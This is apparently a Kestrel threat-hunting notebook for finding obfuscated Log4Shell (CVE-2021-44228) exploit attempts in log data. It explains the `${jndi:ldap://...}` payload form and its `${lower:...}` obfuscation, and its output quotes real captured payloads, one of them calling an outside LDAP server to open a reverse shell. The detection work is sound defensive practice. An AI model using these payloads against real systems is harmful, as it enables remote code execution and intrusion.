# log4shell

### References
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228

Search payloads (`artifact:payload_bin`, which *could* be base64 logs, depending on the data source) for obfuscated log4shell exploit attempts.

Exploit attempts involve the attacker inserting special strings into an application (e.g. specially crafter user agent string in an HTTP request) that she knows will be logged.  If that application uses a vulnerable version of log4j, it will attempt to interpret these special strings, leading to the RCE.

The strings are of the form `${jndi:ldap://example.com/path}`.  Other schemes besides ldap, such as dns, rmi, etc. can be used as well.  The strings can be obfuscated with other "property substition" constructs, like `${lower:J}` which, when evaluated, returns `j`.

The detection logic here attempts to pick out strings like `${...}` and parse/interpret them to deobfuscate.  The parser will either give up or return the deobfuscated JNDI string, so you can inspect the target (which might help reduce false positives, or help you collect attack server URIs).

## Step 1: collect some data

This notebook uses a STIX bundle with real exploit data, hosted on github.  You can replace that URL with your own stix-shifter data source config to search any supported data source.

The regular expression used in the STIX pattern, `.*` is perhaps overly broad.  You should tailor it to your environment.

In [1]:
logs = GET artifact FROM https://raw.githubusercontent.com/opencybersecurityalliance/kestrel-analytics/release/testdata/log4shell_bundle.json
    WHERE [artifact:payload_bin MATCHES '.*']

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,ipv4-addr*,mac-addr*,network-traffic*,x-ibm-finding*,x-oca-event*,x-qradar*
logs,artifact,10,10,0,30,20,10,10,10,10


## Step 2: apply detection logic

Now run the "analytic" to try and pick out exploit attempts.  It will add an `exploit` attribute to each entity in the `logs` variable.  If an exploit attempt is found in that payload, it will be deobfuscated and added to the entity.
It will also add the base64-decoded payload as `original`.

In [2]:
APPLY log4shell-deobfuscation-and-detection ON logs

## Step 3: filter

Now filter the enriched `logs` variable so that only entities with non-NULL `exploit` attributes remain.  The display those for manual inspection.

In [6]:
susp = GET artifact FROM logs WHERE [artifact:exploit LIKE '%']
DISP susp ATTR id, first_observed, exploit, original

id,first_observed,exploit,original
artifact--1059326b-6737-470d-b04b-060c56001db8_10,2021-12-15T09:28:41.056Z,\${jndi:ldap://162.55.90.26/876014912/c},"{""timestamp"":1639560351919,""formatVersion"":1,""webaclId"":""arn:aws:wafv2:us-east-1:920294754780:regional/webacl/AWS-Test-WAF/cff90920-8de1-458f-a021-813c92c9ab2e"",""terminatingRuleId"":""AWS-AWSManagedRulesKnownBadInputsRuleSet"",""terminatingRuleType"":""MANAGED_RULE_GROUP"",""action"":""BLOCK"",""terminatingRuleMatchDetails"":[],""httpSourceName"":""ALB"",""httpSourceId"":""920294754780-app/Test-Load-Balancer/ef5a918154bdeb50"",""ruleGroupList"":[{""ruleGroupId"":""AWS#AWSManagedRulesCommonRuleSet"",""terminatingRule"":null,""nonTerminatingMatchingRules"":[],""excludedRules"":null},{""ruleGroupId"":""AWS#AWSManagedRulesKnownBadInputsRuleSet"",""terminatingRule"":{""ruleId"":""Log4JRCE"",""action"":""BLOCK"",""ruleMatchDetails"":null},""nonTerminatingMatchingRules"":[],""excludedRules"":null}],""rateBasedRuleList"":[],""nonTerminatingMatchingRules"":[],""requestHeadersInserted"":null,""responseCodeSent"":null,""httpRequest"":{""clientIp"":""157.90.35.190"",""country"":""DE"",""headers"":[{""name"":""Host"",""value"":""127.0.0.1""},{""name"":""User-Agent"",""value"":""\${jndi:ldap://162.55.90.26/876014912/C}""},{""name"":""Connection"",""value"":""Close""}],""uri"":""/"",""args"":"""",""httpVersion"":""HTTP/1.1"",""httpMethod"":""GET"",""requestId"":""1-61b9b49f-63d3927e516da57a1b0f8931""},""labels"":[{""name"":""awswaf:managed:aws:known-bad-inputs:Log4JRCE""}]}"
artifact--1c270e5e-8862-4739-a6dd-14f237f746f4_10,2021-12-15T17:25:05.079Z,\${jndi:ldap://xf.world80.log4j.binaryedge.io:80/callback},Dec 15 12:25:04 127.0.0.1 [dylanh@72.185.253.5 (6378) /console/do/ariel/arielDetails] com.q1labs.core.shared.ariel.CustomKeyCreator: [WARN] [NOT:0000004000][172.31.79.90/- -] [-/- -]keyFromString failed. Expression for property Sender Host tried to return \${jndi:\${lower:l}\${lower:d}a\${lower:p}://xf.world80.log4j.bin\${upper:a}ryedge.io:80/callback} as class com.q1labs.core.dao.util.Host. Check the custom property definition to ensure it is the proper type.\n
artifact--2cd84670-2574-4da6-aa5e-06312fa73cac_10,2021-12-14T21:43:32.567Z,\${jndi:ldap://167.99.32.139:1389/basic/reverseshell/167.99.32.139/9999},"{""timestamp"":1639517866786,""formatVersion"":1,""webaclId"":""arn:aws:wafv2:us-east-1:920294754780:regional/webacl/AWS-Test-WAF/cff90920-8de1-458f-a021-813c92c9ab2e"",""terminatingRuleId"":""AWS-AWSManagedRulesKnownBadInputsRuleSet"",""terminatingRuleType"":""MANAGED_RULE_GROUP"",""action"":""BLOCK"",""terminatingRuleMatchDetails"":[],""httpSourceName"":""ALB"",""httpSourceId"":""920294754780-app/Test-Load-Balancer/ef5a918154bdeb50"",""ruleGroupList"":[{""ruleGroupId"":""AWS#AWSManagedRulesCommonRuleSet"",""terminatingRule"":null,""nonTerminatingMatchingRules"":[],""excludedRules"":null},{""ruleGroupId"":""AWS#AWSManagedRulesKnownBadInputsRuleSet"",""terminatingRule"":{""ruleId"":""Log4JRCE"",""action"":""BLOCK"",""ruleMatchDetails"":null},""nonTerminatingMatchingRules"":[],""excludedRules"":null}],""rateBasedRuleList"":[],""nonTerminatingMatchingRules"":[],""requestHeadersInserted"":null,""responseCodeSent"":null,""httpRequest"":{""clientIp"":""157.245.108.125"",""country"":""IN"",""headers"":[{""name"":""User-Agent"",""value"":""borchuk/3.1 \${jndi:ldap://167.99.32.139:1389/Basic/ReverseShell/167.99.32.139/9999}""},{""name"":""Accept"",""value"":""*/*""},{""name"":""Bearer"",""value"":""\${jndi:ldap://167.99.32.139:1389/Basic/ReverseShell/167.99.32.139/9999}""},{""name"":""Authentication"",""value"":""\${jndi:ldap://167.99.32.139:1389/Basic/ReverseShell/167.99.32.139/9999}""},{""name"":""X-Requested-With"",""value"":""\${jndi:ldap://167.99.32.139:1389/Basic/ReverseShell/167.99.32.139/9999}""},{""name"":""X-Requested-For"",""value"":""\${jndi:ldap://167.99.32.139:1389/Basic/ReverseShell/167.99.32.139/9999}""},{""name"":""X-Api-Version"",""value"":""\${jndi:ldap://167.99.32.1

## Alternative searches

You may want to search for more specific STIX Cyber Observables (SCOs) like `url` or `network-traffic` (which *may* use the `http-request-ext` extension, potentially giving you visibility into HTTP request headers like `User-Agent`.

For URLs, you could try a pattern like `[url:value MATCHES '\$\{']` but URL encoding would cause it to miss.

In [4]:
urls = GET url
       FROM https://raw.githubusercontent.com/opencybersecurityalliance/kestrel-analytics/release/testdata/log4shell_bundle.json
       WHERE [url:value MATCHES '.*']

VARIABLE,TYPE,#(ENTITIES),#(RECORDS)
urls,url,0,0
